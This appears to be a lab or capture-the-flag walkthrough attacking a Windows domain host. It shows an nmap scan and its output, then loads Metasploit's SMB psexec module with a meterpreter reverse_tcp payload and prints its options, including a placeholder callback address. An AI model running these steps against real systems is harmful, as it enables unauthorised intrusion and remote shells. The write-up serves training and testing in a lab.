Let’s do a quick nmap scan: sudo nmap -sV -vv 10.10.131.12

```
Completed Ping Scan at 06:54, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Stats: 0:00:03 elapsed 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan at 06:54
Host is up, received echo-reply ttl 125 (0.17s latency).
53/tcp   open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 13:55:09Z)
135/tcp  open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 125
593/tcp  open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
Service Info: Host: ACME-TEST OS: Windows CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/./share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds
```

Ports 135, 139 and 445 look very promising.

Exploitation

Let’s try loading Metasploit msfconsole and leveraging the exploit/windows/smb/psexec module:

```
msf6 > use exploit/windows/smb/psexec
No payload configured, defaulting to windows/meterpreter/reverse_tcp
```

Now we should look at our options:

```
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   SERVICE_DESCRIPTION                    no        Service description to to be used on t
   SERVICE_DISPLAY_NAME                   no        The service display name
   SMBDomain                              no        The Windows domain to use for authenti
   SMBPass                                no        The password for the specified usernam
   SMBSHARE                               no        The share to connect to, can be an adm
   SMBUser                                no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   EXITFUNC              thread           yes       Exit technique (Accepted: '', seh, thread, process
   LHOST                 x.x.x.x          yes       The listen address (an interface may be specified)
```